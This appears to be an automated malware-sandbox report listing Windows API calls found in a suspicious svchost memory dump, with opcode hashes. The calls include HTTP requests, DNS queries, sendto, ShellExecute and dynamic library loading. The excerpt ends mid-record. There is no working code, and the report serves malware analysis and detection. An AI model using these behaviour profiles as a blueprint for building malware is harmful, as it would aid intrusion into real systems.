                                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,?), ref: 13154533
                                                                                                                                                                                • _memset.LIBCMT ref: 1315454B
                                                                                                                                                                                • setSBUpLow.LIBCMT ref: 1315461E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2658552758-0
                                                                                                                                                                                • Opcode ID: af18a46d693f277a3becd28f6804c801e3623c72dd25ab6cf07ae02fca43cde2
                                                                                                                                                                                • Instruction ID: 259ffcc76c571c273d729dd352e0eb1f8d466d9ffdb8b133224f34a6d63f1319
                                                                                                                                                                                • Opcode Fuzzy Hash: af18a46d693f277a3becd28f6804c801e3623c72dd25ab6cf07ae02fca43cde2
                                                                                                                                                                                • Instruction Fuzzy Hash: FE510831B842559BDF15CF29C5C02AABBB5FF07305F19806AF8A1AB142DF38D546CB90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 13145058
                                                                                                                                                                                • InternetConnectA.WININET(00000000,00000003,00000000,00000000,00000000,00000003,00000000,00000000), ref: 13145078
                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1314508D
                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 1314509E
                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000005,?,00000000), ref: 131450BB
                                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,0000000A,0000000A), ref: 131450F3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HttpInternet$OpenRequest$ConnectFileInfoQueryReadSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2757949531-0
                                                                                                                                                                                • Opcode ID: 22a331550de01ec2645564005e4bf32a19f9b79704b9f3f78d1406bbc28db17e
                                                                                                                                                                                • Instruction ID: 09c29ee9dc8f61bf166d10f3b65744c0c26bb08a5acef0fee06af39049fcad0c
                                                                                                                                                                                • Opcode Fuzzy Hash: 22a331550de01ec2645564005e4bf32a19f9b79704b9f3f78d1406bbc28db17e
                                                                                                                                                                                • Instruction Fuzzy Hash: 07211D76601229FBC7219FA5CD88DDF7EBCEF4AA94B240465F505E2144E7758A00DAF0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,13153CE0,1315291D,?,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152A34
                                                                                                                                                                                • TlsGetValue.KERNEL32(FFFFFFFF,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2,0000000E), ref: 13152A4B
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2,0000000E), ref: 13152A60
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 13152A7B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$AddressHandleModuleProc
                                                                                                                                                                                • String ID: DecodePointer$KERNEL32.DLL
                                                                                                                                                                                • API String ID: 1929421221-629428536
                                                                                                                                                                                • Opcode ID: a609e0a7ba11ec13703ef7aa25dba9acf97b0a5567b04403f26ecb8a3393253b
                                                                                                                                                                                • Instruction ID: b4e05761edf62e54dbc4545019f5d9e869c00bef6ec4c5d3774284c63bf699bc
                                                                                                                                                                                • Opcode Fuzzy Hash: a609e0a7ba11ec13703ef7aa25dba9acf97b0a5567b04403f26ecb8a3393253b
                                                                                                                                                                                • Instruction Fuzzy Hash: 0BF09032B016339BDB25AB34CD809EA3BE49F0765570A9530F834D2568DB34CC038AB1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,13152A25,00000000,13154BC5,00000000,00000000,00000314,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529BD
                                                                                                                                                                                • TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529D4
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529E9
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 13152A04
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$AddressHandleModuleProc
                                                                                                                                                                                • String ID: EncodePointer$KERNEL32.DLL
                                                                                                                                                                                • API String ID: 1929421221-3682587211
                                                                                                                                                                                • Opcode ID: dbd8e95abb6b26bb792cc7c44c719981a33c5c225c9ed220c3a3ad9b10ba74aa
                                                                                                                                                                                • Instruction ID: 24c0117114e492440c28f1d5c39adab70944fff5a4f1df7456b3bd22a83b3f8f
                                                                                                                                                                                • Opcode Fuzzy Hash: dbd8e95abb6b26bb792cc7c44c719981a33c5c225c9ed220c3a3ad9b10ba74aa
                                                                                                                                                                                • Instruction Fuzzy Hash: 69F0BB32A016339FD715AB34CD409E93FE4AF026A571A5031F834D2664DB34C843CBB1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e9483793b51f18562a042eab7b94ad45d390c3c37eb3d74f0cf4db488e0e7b62
                                                                                                                                                                                • Instruction ID: a1bc85e87a5082a15a66d266459d616b395269c07320ba7d49f003b92ade8b0e
                                                                                                                                                                                • Opcode Fuzzy Hash: e9483793b51f18562a042eab7b94ad45d390c3c37eb3d74f0cf4db488e0e7b62
                                                                                                                                                                                • Instruction Fuzzy Hash: 52A1A1B1D00259AFEB11CBA4CE40BEE7FF9AF05244F384065ED45A7241E772AA45CBA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13144EB1: EnterCriticalSection.KERNEL32(00000000,1314E300,?,00000000,00000000,-00000004), ref: 13144EBC
                                                                                                                                                                                • StrStrA.SHLWAPI(1314E1F5,13141444,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314DE4A
                                                                                                                                                                                • StrStrA.SHLWAPI(1314E1F5,-00000004,0000008B,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314DE6F
                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 1314DED5
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314DEDB
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 1314DF0B
                                                                                                                                                                                • ShellExecuteA.SHELL32(00000000,-00000004,0000008E,?,00000000,00000000), ref: 1314DF41
                                                                                                                                                                                  • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountCriticalDirectoryEnterExecuteSectionShellSystemTicklstrlenwnsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 995194965-0
                                                                                                                                                                                • Opcode ID: f1b16177eb60bb3f06fffe8c988b7e6be6c45d5d427c6737483f350ae988b7c2
                                                                                                                                                                                • Instruction ID: d7977b32be43569a95afd508c2d17b917a4bd55606c831bcbcfa564dc768f962
                                                                                                                                                                                • Opcode Fuzzy Hash: f1b16177eb60bb3f06fffe8c988b7e6be6c45d5d427c6737483f350ae988b7c2
                                                                                                                                                                                • Instruction Fuzzy Hash: 827116B6A00354BFDF15DFA4CC909DE77ADEB41304F684079E445A7281DB74AA81CBA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GdipAlloc.GDIPLUS(00000008,00000000,?,131475F5), ref: 1314F518
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocGdip
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1856340535-0
                                                                                                                                                                                • Opcode ID: aebcb12a3578fe10b01d8265182e782cd0a2cf7a18f50d2cb95028721df1330d
                                                                                                                                                                                • Instruction ID: 58c0bede6d2ce8bc3834ef223cce97252fcec478fb1f6e2d05153a6d4ce50cdf
                                                                                                                                                                                • Opcode Fuzzy Hash: aebcb12a3578fe10b01d8265182e782cd0a2cf7a18f50d2cb95028721df1330d
                                                                                                                                                                                • Instruction Fuzzy Hash: 3941D67AF40315ABCF059FF8C9846ADB7B9EF48240F384439E515A7340DF759A588BA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 1314D075
                                                                                                                                                                                  • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 1314D0AE
                                                                                                                                                                                • DnsQuery_A.DNSAPI(?,0000000C,00000028,00000000,?,00000000), ref: 1314D0C1
                                                                                                                                                                                • StrStrIA.SHLWAPI(?,-00000004,000000BD,0000000C,00000028,00000000,?,00000000), ref: 1314D0E6
                                                                                                                                                                                • DnsRecordListFree.DNSAPI(?,?), ref: 1314D14E
                                                                                                                                                                                • GetLastError.KERNEL32(0000000C,00000028,00000000,?,00000000), ref: 1314D17B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wnsprintf$ErrorFreeLastListQuery_Recordlstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3873175859-0
                                                                                                                                                                                • Opcode ID: b9a01a87296449b41382b83979c05cedc972fd9e8370d67458ba98add1af47bf
                                                                                                                                                                                • Instruction ID: bc62b6f53ce000f612bbbc7078d564fc3d92f5ae585763868b6e5887046a94d4
                                                                                                                                                                                • Opcode Fuzzy Hash: b9a01a87296449b41382b83979c05cedc972fd9e8370d67458ba98add1af47bf
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F4128B16402596FEB25ABA8CC91BEA3BDCEB15704FA80026FD60D2193D368D554DB31
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExA.KERNEL32(-00000004,000000F5,00000000,00000000,00000004,00000001), ref: 13146E28
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,-00000004), ref: 13146E47
                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 13146E5D
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 13146E6E
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 13146E98
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 13146EBD
                                                                                                                                                                                  • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryTimewnsprintf$AddressFileFreeLoadProcSystemlstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2555659749-0
                                                                                                                                                                                • Opcode ID: e0bff822e13d61dd72824745379a1d524290620c2234ef465190ce2767934253
                                                                                                                                                                                • Instruction ID: 65c2ee745b24d8afc592ee7e773b41c5e4be4c040a78e8adda1288c531677f7c
                                                                                                                                                                                • Opcode Fuzzy Hash: e0bff822e13d61dd72824745379a1d524290620c2234ef465190ce2767934253
                                                                                                                                                                                • Instruction Fuzzy Hash: 23218B72900229FBDB00EFA4CC849EE7B7CEF08B28F248425F505A6244D7719A55CBA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenFile.KERNEL32 ref: 13144B8A
                                                                                                                                                                                • OpenFile.KERNEL32 ref: 13144BA2
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 13144BA6
                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 13144BB2
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,1314DF21,1314E1F5,00000000), ref: 13144BC4
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 13144BCB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Open$CloseErrorHandleLastPointerWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1166246964-0
                                                                                                                                                                                • Opcode ID: 51cdfe6b6749e1e5a26ed3c2d898b94d31f371a768f9a6befa70090ac7cf3a87
                                                                                                                                                                                • Instruction ID: eb059693e3b0b8f311bb134399644d03a10fbc70257f38f66da383a90725c8e9
                                                                                                                                                                                • Opcode Fuzzy Hash: 51cdfe6b6749e1e5a26ed3c2d898b94d31f371a768f9a6befa70090ac7cf3a87
                                                                                                                                                                                • Instruction Fuzzy Hash: 2EF04F72601168BBDB246B66DC88DEF3FBDEB89664F008125FA09D3084DB748945DFB0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(inetcomm.dll,00000000,00000000,00000067,?,?,?,?,?,?,?,?,?,1314DA7C,00000000), ref: 13146CF5
                                                                                                                                                                                • LoadLibraryA.KERNEL32(inetcomm.dll,?,?,?,?,?,?,?,?,?,1314DA7C,00000000), ref: 13146D00
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                                • String ID: MimeOleGenerateMID$inetcomm.dll
                                                                                                                                                                                • API String ID: 4133054770-2511522974
                                                                                                                                                                                • Opcode ID: 94ad63e38ac3a08ab869b589b60b6413d575e4a6955d7de3f7f1914c1dab9f78
                                                                                                                                                                                • Instruction ID: 236f15d98f7b408e97538bd131e1090bfd1012636229232fb745921e275dcd9e
                                                                                                                                                                                • Opcode Fuzzy Hash: 94ad63e38ac3a08ab869b589b60b6413d575e4a6955d7de3f7f1914c1dab9f78
                                                                                                                                                                                • Instruction Fuzzy Hash: AEF0A031344322EBC301AB79AC44B8FAA6D9FD5A7AF380838F040F1004E72494425272
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a9c0f0ee489942955c4d027aee019131bbe61b98e97264bedac0433adbc81ef9
                                                                                                                                                                                • Instruction ID: ee50b3158d8374e2205bbdc78726c599e77e4a5b8b3f5f2d8e843d41d0ff5688
                                                                                                                                                                                • Opcode Fuzzy Hash: a9c0f0ee489942955c4d027aee019131bbe61b98e97264bedac0433adbc81ef9
                                                                                                                                                                                • Instruction Fuzzy Hash: F7B191B5A00306EFDB14CFA8CC91E6EBBB9FF18304F244569E956AB691D730E911CB50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrcmpA.KERNEL32(1314DA5B,-00000004,00000042,-00000004,0000007A,00000000,1314E1F1,00000000,1314E1F5), ref: 1314D376
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcmp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1534048567-0
                                                                                                                                                                                • Opcode ID: 12f2c09409d24c4e054f6c672668061102ef24238b7d1e7e0faab0b08158be4f
                                                                                                                                                                                • Instruction ID: 6cabc15ffc21ca0ef62386b654588a5c7bc9dc68298394349ababf14b398281b
                                                                                                                                                                                • Opcode Fuzzy Hash: 12f2c09409d24c4e054f6c672668061102ef24238b7d1e7e0faab0b08158be4f
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B61D1B5A00326ABDF01DFE8CC81DEEB779EF41658F680425F505A7641EB74E940CBA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 131463B5
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 131463CF
                                                                                                                                                                                • sendto.WS2_32(?,00000374,00000000,13161584,00000010), ref: 131463F7
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 13146401
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 13146413
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Read$ExitProcessSleepsendto
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1614787347-0
                                                                                                                                                                                • Opcode ID: d2f4072409005e6626f78853b55f4e55af6a4931fd5888f89c96aeb35619061e
                                                                                                                                                                                • Instruction ID: f9d9d312b63715cea87f7def494aa1476285842a4910d48bf0ac6b79b102a875
                                                                                                                                                                                • Opcode Fuzzy Hash: d2f4072409005e6626f78853b55f4e55af6a4931fd5888f89c96aeb35619061e
                                                                                                                                                                                • Instruction Fuzzy Hash: 4421F2B29403A8AFDB20EFE48DC0E9A732CAB05758F150934F61A67185E774AE448B61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(00000008,00000001,00000018,00000000,131511FA,00000008,?,1314DF75,76B7EA30,1314E310,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EAEE
                                                                                                                                                                                • WSASetLastError.WS2_32(00000000,?,1314DF75,76B7EA30,1314E310,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EAFF
                                                                                                                                                                                • shutdown.WS2_32(00000000,00000002), ref: 1314EB0A
                                                                                                                                                                                • WSAGetLastError.WS2_32(00000000,00000002,00000000,?,1314DF75,76B7EA30,1314E310,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EB0F
                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 1314EB18
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$Readclosesocketshutdown
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4241232737-0
                                                                                                                                                                                • Opcode ID: 55044d7a4f543ff3f87d1ad7e6e7f63179eb35737f05c55234fbd4be03901f84
                                                                                                                                                                                • Instruction ID: 64597dc8f14b545119c056b7161341aca8f44151334267f50d9d632a3386f452
                                                                                                                                                                                • Opcode Fuzzy Hash: 55044d7a4f543ff3f87d1ad7e6e7f63179eb35737f05c55234fbd4be03901f84
                                                                                                                                                                                • Instruction Fuzzy Hash: 45F06235601240ABCB225F1DDC89D0A77E9EFC3B01B680939F8D8AB214DB31A881CB71
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNEL32(00007530,76B7EA30,00000000,00000000), ref: 1314D8B6
                                                                                                                                                                                  • Part of subcall function 13144EB1: EnterCriticalSection.KERNEL32(00000000,1314E300,?,00000000,00000000,-00000004), ref: 13144EBC
                                                                                                                                                                                  • Part of subcall function 13144C2F: IsBadReadPtr.KERNEL32(00000000,00000004,00000000,00000000,131505F9,?,00000000,00000000), ref: 13144C42
                                                                                                                                                                                  • Part of subcall function 13144C2F: IsBadReadPtr.KERNEL32(00000000,00000001), ref: 13144C56
                                                                                                                                                                                  • Part of subcall function 13144C2F: HeapFree.KERNEL32(00000000,00000000), ref: 13144C6B
                                                                                                                                                                                • lstrlenA.KERNEL32(1314E202,?,?,?,?,?,00000000), ref: 1314D645
                                                                                                                                                                                • inet_ntoa.WS2_32(00000000), ref: 1314D730
                                                                                                                                                                                • wsprintfA.USER32 ref: 1314D756
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Read$CriticalEnterFreeHeapSectionSleepinet_ntoalstrlenwsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3707610853-0
                                                                                                                                                                                • Opcode ID: 51663f21bcf7e422acca725b706df896575aabc9a0bc1173ddc667c30757e91b
                                                                                                                                                                                • Instruction ID: 85804d81a0b3f996cc8e3f993ce6150457bfc5b8273e19742008c52d7d2c31f3
                                                                                                                                                                                • Opcode Fuzzy Hash: 51663f21bcf7e422acca725b706df896575aabc9a0bc1173ddc667c30757e91b
                                                                                                                                                                                • Instruction Fuzzy Hash: 7CA109B5A00265AFEB08EF58C9D0C6577F9FB0524C7688439E945D7316EB34E981CF90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CharLowerA.USER32(00000000,131616E8,?,00000000), ref: 1314E8B5
                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,?,-00000004,00000060,?,00000000,-00000004,0000005F,?,00000000,-00000004,0000005E,?,00000000,-00000004,0000005D), ref: 1314E9D5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharLower
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1615517891-0
                                                                                                                                                                                • Opcode ID: e15f2f67250bf7c819582e290c9eaea27e66e80e3beb9cdf804c5e2b29c6ed88
                                                                                                                                                                                • Instruction ID: 55354aba79ba1874cd0fbe84286657b3d5da400f78d1ff2b94a4c4cac87821d8
                                                                                                                                                                                • Opcode Fuzzy Hash: e15f2f67250bf7c819582e290c9eaea27e66e80e3beb9cdf804c5e2b29c6ed88
                                                                                                                                                                                • Instruction Fuzzy Hash: 9E518076A04605EFDB21CF98C980E9AB7F9FF08314F284429E65AE7290D730F950DB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 1314AF1D
                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,00000000), ref: 1314AFDC
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,-00000004,00000082), ref: 1314AFFE
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00000000), ref: 1314B002
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcat$lstrcpylstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2274183309-0
                                                                                                                                                                                • Opcode ID: af2b05a22181a1154fb521f424507219b8dd8e098b67af918b9410bab3b45479
                                                                                                                                                                                • Instruction ID: a74685481d463179f19788f7fab92f1dad1b175aa3379debd9faf6d6e193eef0
                                                                                                                                                                                • Opcode Fuzzy Hash: af2b05a22181a1154fb521f424507219b8dd8e098b67af918b9410bab3b45479
                                                                                                                                                                                • Instruction Fuzzy Hash: 343150B6A00219AFDB00DFA9CDC09AFB7F9FF48644B558479E556E3200E730EA41CB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,00000000,00000000,76B26490), ref: 13151258
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 13151277
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,-00000004,0000004C,570000AF), ref: 131512B4
